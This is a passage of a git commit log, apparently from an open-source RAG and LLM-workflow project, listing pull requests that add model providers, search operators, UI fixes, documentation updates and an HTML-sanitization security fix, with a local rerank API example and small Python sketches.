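    # Assumption: the ciphertext is base64-encoded again so it can be sent as text.
    return base64.b64encode(ciphertext).decode("ascii")


def fake_cipher(data: bytes) -> bytes:
    """Stand-in that only reverses the bytes. This is NOT encryption."""
    return data[::-1]


print(encode_then_encrypt("secret", fake_cipher))
```

Whichever side decrypts has to undo the steps in reverse order: decrypt first, then base64-decode.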

### Type of change

- [x] Refactoring
2024-07-22 09:24:45 +08:00
a0c1d83ddc update quickstart and llm_api_key_setup document (#1615)
### What problem does this PR solve?

update quickstart and llm_api_key_setup document

### Type of change

- [x] Documentation Update

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 18:37:28 +08:00
657019a5a9 feat: support AWS Bedrock #308 (#1617)
### What problem does this PR solve?

feat: support AWS Bedrock #308
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-19 18:36:49 +08:00
58df013722 Chat Use CVmodel (#1607)
### What problem does this PR solve?

#1230 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-19 18:36:34 +08:00
347cb61f26 add support for StepFun (#1611)
### What problem does this PR solve?

#1561 

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 16:26:12 +08:00
264303ba98 fix delete selected chunks display wrong (#1612)
### What problem does this PR solve?
This PR fixes a bug where deleting selected chunks removed them but left
the Chunk Number unchanged. The Chunk Number now decreases by the number
of chunks deleted.
#900


### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-19 16:25:50 +08:00
1c90c39897 fix: use @tanstack/react-query to get knowledge base data #1306 (#1609)
### What problem does this PR solve?
fix: use @tanstack/react-query to get knowledge base data #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 15:50:44 +08:00
3fcdba1683 add support for LocalAI (#1608)
### What problem does this PR solve?

#762 

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 15:50:28 +08:00
915354bec9 Fix component exception (#1603)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 13:36:45 +08:00
c0090a1b4f fix function create to solve wrong chunk number (#1604)
### What problem does this PR solve?
fix function create to solve the problem that creating a chunk increased
the chunk number by 2.


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue) #900

---------

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-19 13:36:01 +08:00
be6d5b76c3 fix embedding model for Azure (#1601)
### What problem does this PR solve?

#1599

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 09:22:59 +08:00
fb21efd77d fix: after logging out and entering the knowledge base page again, the data before still exists #1306 (#1597)
### What problem does this PR solve?

fix: after logging out and entering the knowledge base page again, the
data before still exists #1306
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 09:07:36 +08:00
cf4fff64f8 feat: add PubMed operator #918 (#1589)
### What problem does this PR solve?

feat: modify the translation of baiduDescription #918
feat: add PubMed operator #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 15:45:34 +08:00
0b94376cd4 add docker-compose-gpu.yml to support gpu (#1591)
### What problem does this PR solve?

add docker-compose-gpu.yml to support gpu
#1558

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-18 15:45:12 +08:00
2b5812d0a9 fix generate error (#1590)
### What problem does this PR solve?

#1550 #1210 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 14:33:30 +08:00
4da3ee400b Add component arxiv (#1587)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 14:08:20 +08:00
f8602b5286 Add component pubmed (#1586)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 13:42:19 +08:00
fc8a752cd5 fix: Minimax API is error! #1353 (#1585)
### What problem does this PR solve?

fix: Minimax API is error! #1353

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 12:09:25 +08:00
478cd006d6 fix: display total items on chunk list page #900 (#1584)
### What problem does this PR solve?
fix: display total items on chunk list page #900

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 11:38:02 +08:00
4d10dbcf95 Fix component debug (#1583)
### What problem does this PR solve?

#1582 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 11:20:58 +08:00
43cd455b52 Updated deploy a local llm using IPEX-LLM (#1578)
### What problem does this PR solve?



### Type of change


- [x] Documentation Update
2024-07-18 11:20:15 +08:00
b54d5807f3 [Bug]: IndentationError: unindent does not match any outer indentatio… (#1579)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

[Bug]: IndentationError: unindent does not match any outer indentation
level #1569
2024-07-18 11:00:52 +08:00
58e95f76c1 feat: change all file names to lowercase #1574 (#1575)
### What problem does this PR solve?

feat: change all file names to lowercase #1574

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 19:07:34 +08:00
06fd35d420 fix: new message appears in wrong chat window. #1289 (#1571)
### What problem does this PR solve?
fix: new message appears in wrong chat window. #1289

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 17:08:24 +08:00
4df75ca84e API: Stop parsing (#1556)
### What problem does this PR solve?

Aims to stop the process of parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 17:07:33 +08:00
701e5be535 fix requirements.txt (#1570)
### What problem does this PR solve?

#1547 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 15:41:10 +08:00
9ae57eb370 fix MiniMax api error (#1567)
### What problem does this PR solve?

#1353 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-17 15:32:51 +08:00
fe5dd5b70a fix: remove duplicate MessageItem #1289 (#1566)
### What problem does this PR solve?

fix: remove duplicate MessageItem #1289

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 14:49:11 +08:00
1015436691 Fix web search and template max tokens (#1564)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 14:19:14 +08:00
83c9f1ed39 Add templates/websearch assistant (#1559)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 12:30:38 +08:00
e4f4b30ae3 Update deploy_local_llm.md (#1557)
Update the xinference rerank model usage document

### Type of change

- [x] Documentation Update
2024-07-17 12:29:33 +08:00
9bf6f7c9a0 refine generate (#1562)
### What problem does this PR solve?



### Type of change

- [x] Refactoring
2024-07-17 12:28:54 +08:00
b06957e561 fix empty input in graph (#1560)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 11:33:49 +08:00
baeedc699d fix: add group id field to ApiKeyModal #1353 (#1540)
### What problem does this PR solve?

fix: add group id field to ApiKeyModal #1353
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 09:45:10 +08:00
00943dc04a Update the Dockerfile.cuda (#1545)
Fix the `Dockerfile.cuda`, as the `/root/miniconda3/envs/py11/bin/pip`
is not found in the base images.

### What problem does this PR solve?

`/root/miniconda3/envs/py11/bin/pip` is not found in the base images.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-07-17 09:44:18 +08:00
f43cf7c2b0 Update requirements.txt with pybind11 2.13.1 (#1548)
necessary for successful installation of the fasttext==0.9.2 module

### What problem does this PR solve?

Aiming to solve issue #1547 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 09:40:41 +08:00
9e1421b77c API Documentation (#1526)
### What problem does this PR solve?

Adds the doc for the newly added API method.

### Type of change


- [x] Documentation Update
2024-07-16 18:07:17 +08:00
13389be3f4 feat: replace open-router.svg #1467 (#1538)
### What problem does this PR solve?

feat: replace open-router.svg #1467

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-16 17:11:37 +08:00
a5306e6345 fix minimax init error (#1537)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 16:55:31 +08:00
99adeabc85 remove dependency (#1536)
### What problem does this PR solve?

#702 
### Type of change
- [x] Refactoring
2024-07-16 16:30:17 +08:00
6a5e1d597c hide reference when cite is disabled (#1535)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 16:16:19 +08:00
266119bf62 fix: Bulk disable the chunk, the UI still shows they are enabled #1236 (#1534)
### What problem does this PR solve?
fix: Bulk disable the chunk, the UI still shows they are enabled #1236

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 15:26:41 +08:00
75086f41a9 'load llm information from a json file and add support for OpenRouter' (#1533)
### What problem does this PR solve?

#1467 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-16 15:19:43 +08:00
3657b1f2a2 fix the tokens error that occurred when adding the xinference model (#1527)
### What problem does this PR solve?

fix the tokens error that occurred when adding the xinference model
#1522 

root@pc-gpu-86-41:~# curl -X 'POST' 'http://127.0.0.1:9997/v1/rerank' -H
'accept: application/json' -H 'Content-Type: application/json' -d '{
"model": "bge-reranker-v2-m3",
"query": "A man is eating pasta.",
"return_documents":"true",
"return_len":"true",
"documents": [
"A man is eating food.",
"A man is eating a piece of bread.",
"The girl is carrying a baby.",
"A man is riding a horse.",
"A woman is playing violin."
]
}'

{"id":"610a8724-3e96-11ef-81ce-08bfb886c012","results":[
{"index":0,"relevance_score":0.999574601650238,"document":{"text":"A man is eating food."}},
{"index":1,"relevance_score":0.07814773917198181,"document":{"text":"A man is eating a piece of bread."}},
{"index":3,"relevance_score":0.000017700713215162978,"document":{"text":"A man is riding a horse."}},
{"index":2,"relevance_score":0.0000163753629749408,"document":{"text":"The girl is carrying a baby."}},
{"index":4,"relevance_score":0.00001631895975151565,"document":{"text":"A woman is playing violin."}}
],"meta":{"api_version":null,"billed_units":null,"tokens":{"input_tokens":38,"output_tokens":38},"warnings":null}}
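
A response of the shape shown above could be read defensively along these lines. This is only a sketch: it is not the code changed in this PR, the helper names `token_counts` and `scores_in_document_order` are hypothetical, and the sample is a trimmed copy of the response above with two of the five results kept.

```python
import json

# Trimmed copy of the rerank response shown above.
SAMPLE_RESPONSE = """
{"id": "610a8724-3e96-11ef-81ce-08bfb886c012",
 "results": [
   {"index": 0, "relevance_score": 0.999574601650238,
    "document": {"text": "A man is eating food."}},
   {"index": 1, "relevance_score": 0.07814773917198181,
    "document": {"text": "A man is eating a piece of bread."}}
 ],
 "meta": {"api_version": null, "billed_units": null,
          "tokens": {"input_tokens": 38, "output_tokens": 38},
          "warnings": null}}
"""


def token_counts(response: dict) -> tuple:
    """Return (input_tokens, output_tokens); missing fields count as 0."""
    tokens = (response.get("meta") or {}).get("tokens") or {}
    return int(tokens.get("input_tokens") or 0), int(tokens.get("output_tokens") or 0)


def scores_in_document_order(response: dict, n_documents: int) -> list:
    """Map scores back to request order; results arrive sorted by relevance."""
    scores = [0.0] * n_documents
    for item in response.get("results", []):
        scores[item["index"]] = item["relevance_score"]
    return scores


response = json.loads(SAMPLE_RESPONSE)
print(token_counts(response))
print(scores_in_document_order(response, 2))
```

Falling back to 0 when `meta` or `tokens` is absent is a design choice for the sketch. A caller that bills by token may prefer to raise instead.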

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-07-16 15:08:51 +08:00
975798c643 fix: Hundreds of chunks list can't choose page #1238 (#1532)
### What problem does this PR solve?

fix: Hundreds of chunks list can't choose page #1238

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 15:06:38 +08:00
607de74ace fix minimax bug (#1528)
### What problem does this PR solve?

#1353 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 10:55:33 +08:00
2a647162a8 fix bugs about multi input for generate (#1525)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 09:28:13 +08:00
d4332643c4 fix wikipedia language (#1519)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 19:17:17 +08:00
2ea696934b fix: fixed the issue of error when opening the canvas #918 (#1520)
### What problem does this PR solve?

fix: fixed the issue of error when opening the canvas #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 19:17:03 +08:00
5a6a34cef9 Added supported LLMs (#1517)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-07-15 17:55:52 +08:00
1daa0b4d46 feat: add Wikipedia operator #918 (#1516)
### What problem does this PR solve?

Add Wikipedia operator #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:48:01 +08:00
60d406acaa Set wikipedia lang (#1515)
### What problem does this PR solve?



### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:45:40 +08:00
1a6bd437f5 API: show status of parsing (#1504)
### What problem does this PR solve?

show status of parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:18:44 +08:00
258a10fb74 Add component Wikipedia (#1513)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 16:41:20 +08:00
fdc21ec853 fix: Add Model Providers:Azure-OpenAI error #1402 (#1512)
### What problem does this PR solve?

fix: Add Model Providers:Azure-OpenAI error #1402
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 15:55:04 +08:00
c2693d2f46 fix: fixed the issue that the llm field in the KeywordExtract form had no default value (#1510)
### What problem does this PR solve?
fix: fixed the issue that the llm field in the KeywordExtract form had
no default value

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 15:44:31 +08:00
ca9c9c4e1e feat: remove dagre and elkjs #918 (#1506)
### What problem does this PR solve?

feat: remove dagre and elkjs #918
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 14:57:49 +08:00
bafe137502 Fix: Implement DOMPurify to sanitize HTML content before rendering (#1498)
### What problem does this PR solve?

This PR resolves issue #1491 related to HTML Injection and Cross-Site
Scripting (XSS). The issue was caused by the unsafe usage of
`dangerouslySetInnerHTML` without proper sanitization of user input.

### Changes
- Added DOMPurify dependency.
- Updated the following components to use DOMPurify:
  - `web/src/pages/add-knowledge/components/knowledge-chunk/components/chunk-card/index.tsx`
  - `web/src/pages/chat/markdown-content/index.tsx`
  - `web/src/pages/add-knowledge/components/knowledge-setting/category-panel.tsx`

### Type of change

- [x] Other (please describe): Security Fix
2024-07-15 10:24:23 +08:00
2dea8448a6 fix: fixed the issue where parameters of DuckDuckGo could not be saved to the backend after being dragged to the canvas #918 (#1503)
### What problem does this PR solve?

fix: fixed the issue where parameters of DuckDuckGo could not be saved
to the backend after being dragged to the canvas #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 10:23:16 +08:00
d9868d0229 fix: fixed the issue where the greeting message could not be displayed when opening the debug window #918 (#1499)
### What problem does this PR solve?

fix: fixed the issue where the greeting message could not be displayed
when opening the debug window #918

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 23:39:07 +08:00
38a90c32b2 fix duckduckgo.py (#1497)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 19:43:18 +08:00
eecec7b119 refactor name of duckduckgo (#1496)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-07-12 19:20:12 +08:00
4eeb535946 refine db connection (#1495)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-07-12 18:18:12 +08:00
26de9adb41 refine db connection (#1494)
### What problem does this PR solve?



### Type of change


- [x] Refactoring
2024-07-12 18:11:34 +08:00
0c9a7caa9d feat: add llm Select to KeywordExtractForm #918 (#1492)
### What problem does this PR solve?

feat: add llm Select to KeywordExtractForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 17:22:01 +08:00
a5a617b7a3 fix ollama max token issue (#1489)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:37:32 +08:00
d5618749c9 Fix baidusearch and duckduckgosearch (#1488)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:28:24 +08:00
de8267cfd7 fix: add message_history_window_size to GenerateForm #1472 (#1487)
### What problem does this PR solve?
fix: add message_history_window_size to  GenerateForm #1472
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:11:49 +08:00
740714b79d feat: translate text from DuckDuckGo #918 (#1486)
### What problem does this PR solve?

feat: translate text from DuckDuckGo #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 15:22:36 +08:00
013db9410f feat: modify DuckDuckGo's style #918 (#1485)
### What problem does this PR solve?

feat: modify DuckDuckGo's style #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 15:04:45 +08:00
b96ba6f831 add Gemini key (#1480)
### What problem does this PR solve?

#1036

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-12 13:41:58 +08:00
d29fd52e14 fix bug about divided by zero (#1482)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 12:59:56 +08:00
99f7bbaaa2 fix bugs of rerank model with xinference (#1481)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 12:33:37 +08:00
575099df2d feat: add KeywordExtractForm and BaiduForm and DuckDuckGoForm #918 (#1477)
### What problem does this PR solve?
feat: add KeywordExtractForm and BaiduForm and DuckDuckGoForm #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 11:37:31 +08:00
ddeac9ab3d added SVG for Groq model providers (#1470)
#1432  #1447 
This PR adds support for the GROQ LLM (Large Language Model).

Groq is an AI solutions company delivering ultra-low latency inference
with the first-ever LPU™ Inference Engine. The Groq API enables
developers to integrate state-of-the-art LLMs, such as Llama-2 and
llama3-70b-8192, into low latency applications with the request limits
specified below. Learn more at [groq.com](https://groq.com/).
Supported Models

| ID | Requests per Minute | Requests per Day | Tokens per Minute |
|----------------------|---------------------|------------------|-------------------|
| gemma-7b-it | 30 | 14,400 | 15,000 |
| gemma2-9b-it | 30 | 14,400 | 15,000 |
| llama3-70b-8192 | 30 | 14,400 | 6,000 |
| llama3-8b-8192 | 30 | 14,400 | 30,000 |
| mixtral-8x7b-32768 | 30 | 14,400 | 5,000 |

---------

Co-authored-by: paresh0628 <paresh.tuvoc@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-12 09:25:44 +08:00
009e18f094 feat: support xinference rerank model (#1466)
### What problem does this PR solve?

support xinference rerank model
#1455 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-11 18:37:41 +08:00
9c023b6d8c feat: validate the name field of the categorize operator for duplicate names and nulls #918 (#1471)
### What problem does this PR solve?

feat: validate the name field of the categorize operator for duplicate
names and nulls #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 18:22:53 +08:00
2c2b2e0779 API: start parsing (#1377)
### What problem does this PR solve?

Make the document start parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-11 18:19:18 +08:00
8d7fb12305 fix: monitor changes in the data.form field of the categorize and relevant operators and then synchronize them to the edge #918 (#1469)
### What problem does this PR solve?
feat: monitor changes in the table of relevant operators and synchronize
them to the edge #918
feat: fixed the issue of repeated requests when opening the graph page
#918
feat: cache node anchor coordinate information #918
feat: monitor changes in the data.form field of the categorize and
relevant operators and then synchronize them to the edge #918
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 18:01:50 +08:00
7f4c63d102 fix: Delete hardcode (#1464)
### What problem does this PR solve?

After the language of the PDF was detected, a later line hardcoded the
language to Chinese. This PR deletes that hardcoded line.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 15:41:31 +08:00
3e9f444e6b add support for Gemini (#1465)
### What problem does this PR solve?

#1036

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-11 15:41:00 +08:00
2290c2a2f0 fix pdf_parser char content confusion (#1462)
### What problem does this PR solve?

#1407 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 14:37:55 +08:00
dbb8f7b77b fix pdf_parser content confusion (#1458)
### What problem does this PR solve?

#1407 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 12:36:55 +08:00
8964817d72 API doc: Correct Base URL and Dataset URL. (#1444)
The correct URL is `http://<host_address>/v1/api`, not
`http://<host_address>/api/v1`.
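
As a small illustration of the corrected path order, the base URL could be assembled like this. The helper name `base_url` is hypothetical; only the `/v1/api` suffix comes from the note above.

```python
def base_url(host_address: str) -> str:
    """Build the API base URL: the version segment comes before 'api'.

    Hypothetical helper for illustration; only the '/v1/api' path
    order is taken from the commit message.
    """
    return f"http://{host_address}/v1/api"
```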

### What problem does this PR solve?

### Type of change

- [x] Documentation Update

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-10 09:39:27 +08:00
0b950da73f fix no result bugs (#1449)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
2024-07-09 19:16:35 +08:00
30b88e2b91 fix no result bugs (#1448)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-09 18:06:09 +08:00
fb66b1e726 feat: display the debugging results of each operator in a pop-up window #918 (#1445)
### What problem does this PR solve?

feat: display the debugging results of each operator in a pop-up window
#918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 16:34:59 +08:00
198a8b6592 feat: translate name of operator #918 (#1437)
### What problem does this PR solve?

feat: translate name of operator #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 13:22:37 +08:00
56e3fa2d6a Update README (#1438)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-07-09 13:22:25 +08:00
24f9b17ff6 feat: translate graph and chat text (#1433)
translate graph and chat text
2024-07-09 10:43:52 +08:00
427fb97562 feat: translate the to field #918 (#1435)
### What problem does this PR solve?

feat: translate the to field #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 10:30:36 +08:00
3413f43b47 Fixed a docusaurus display issue (#1431)
### What problem does this PR solve?


### Type of change


- [x] Documentation Update
2024-07-08 19:30:29 +08:00
f8aa31b159 feat: add bedrock icon (#1430)
### What problem does this PR solve?

feat: add bedrock icon #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 19:14:25 +08:00
669d634d74 empty kb id for templates (#1429)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-07-08 19:10:27 +08:00
59417016a8 feat: translate graph of header #918 (#1428)
### What problem does this PR solve?

feat: translate graph of header #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 18:52:13 +08:00
1eb1f7ad33 feat: translate graph list #918 (#1426)
### What problem does this PR solve?

feat: translate graph list #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 18:14:34 +08:00
98295caffe update Minimax and Azure-Openai icon in setting page (#1420)
### What problem does this PR solve?

update Minimax and Azure-Openai icon in setting page
#1156 #308 #433

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-08 17:55:04 +08:00
f5dc94fc85 feat: highlight the nodes that the workflow passes through #918 (#1423)
### What problem does this PR solve?

feat: highlight the nodes that the workflow passes through #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 17:45:17 +08:00
c889ef6363 examples empty in categorize (#1422)
### What problem does this PR solve?

Examples empty in categorize

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 17:40:50 +08:00
593c20889d update docs for release 0.8.0 (#1419)
### What problem does this PR solve?

update docs for release 0.8.0

### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-07-08 17:06:33 +08:00
fce3f6df8e feat: when Categorize establishes a connection with other operators, it adds the target node to the to field. #918 (#1418)
### What problem does this PR solve?
feat: when Categorize establishes a connection with other operators, it
adds the target node to the to field. #918

feat: modify the Chinese text of loop #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 16:29:54 +08:00
61557a101a fix botocore (#1414)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 16:20:19 +08:00
1f967191d4 feat: add icon to title of operator form #918 (#1413)
### What problem does this PR solve?
feat: add icon to title of operator form #918


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 12:32:46 +08:00
0f597b9817 feat: node cannot connect to itself #918 (#1412)
### What problem does this PR solve?

feat: node cannot connect to itself #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 11:42:12 +08:00
1cff117dc9 feat: translate graph #918 (#1411)
### What problem does this PR solve?

feat: translate graph #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 10:55:10 +08:00
e3f5464457 fix duckduckgosearch.py bug (#1410)
### What problem does this PR solve?

fix duckduckgosearch.py bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 10:33:26 +08:00
6144a109ab Add Support for AWS Bedrock (#1408)
### What problem does this PR solve?

#308 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-07-08 09:37:34 +08:00
b3ebc66b13 be more specific for error message (#1409)
### What problem does this PR solve?

#918 

### Type of change

- [x] Refactoring
2024-07-08 09:32:44 +08:00
dcb3fb2073 fix: use user-defined rerank model's top_k parameter when knowledge Q&A conversation (#1396)
### What problem does this PR solve?

During knowledge Q&A conversations, the user-defined rerank model's
top_k parameter was not used

#1395 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 09:25:49 +08:00
f4674ae9d0 add Duckduckgo pkg (#1392)
### What problem does this PR solve?

#918 

### Type of change

- [x] Documentation Update
2024-07-08 09:22:50 +08:00
de610091eb feat: after deleting the edge, set the corresponding field in the node's form field to undefined #918 (#1393)
### What problem does this PR solve?

feat: after deleting the edge, set the corresponding field in the node's
form field to undefined #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 19:08:00 +08:00
d57a68bc2a feat: add duckduckgo icon #918 (#1391)
### What problem does this PR solve?
feat: add duckduckgo icon #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 16:59:04 +08:00
a2eb0df875 Duckduckgosearch (#1388)
### What problem does this PR solve?

#918 

Add components: Baidu, Duckduckgo

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 16:14:32 +08:00
edc61e9b4c feat: save the parameters of the generate operator to the form field … (#1390)
### What problem does this PR solve?
feat: save the parameters of the generate operator to the form field of
the node #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 15:52:24 +08:00
472fcba7af feat: save graph data before opening the debug drawer #918 (#1387)
### What problem does this PR solve?
feat: save graph data before opening the debug drawer #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 14:16:03 +08:00
74ec3bc4d9 feat: add GraphAvatar to graph list #918 (#1385)
### What problem does this PR solve?

feat: add GraphAvatar to graph list #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 11:04:19 +08:00
a3f4258cfc feat: click on a blank area of the canvas to hide the form drawer #918 (#1384)
### What problem does this PR solve?
feat: click on a blank area of the canvas to hide the form drawer #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 10:44:14 +08:00
cf542e80b3 Add Graph Baidusearch and dsl_example (#1378)
### What problem does this PR solve?

#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 09:50:57 +08:00
957cd55e4a feat: deleting a node does not require a confirmation box to pop up #918 (#1380)
### What problem does this PR solve?

feat: deleting a node does not require a confirmation box to pop up #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 19:32:47 +08:00
25a8c076bf feat: add description text to operators and extract the useFetchModelId to logicHooks.ts and drag the operator to the canvas and initialize the form data #918 (#1379)
### What problem does this PR solve?

feat: add description text to operators #918 
feat: drag the operator to the canvas and initialize the form data #918
feat: extract the useFetchModelId to logicHooks.ts
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 19:18:02 +08:00
306108fe0e API: Download doc api (#1354)
### What problem does this PR solve?

Adds download_document api

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:33:55 +08:00
daaf6aed50 feat: replace the graph icon in the header #918 (#1376)
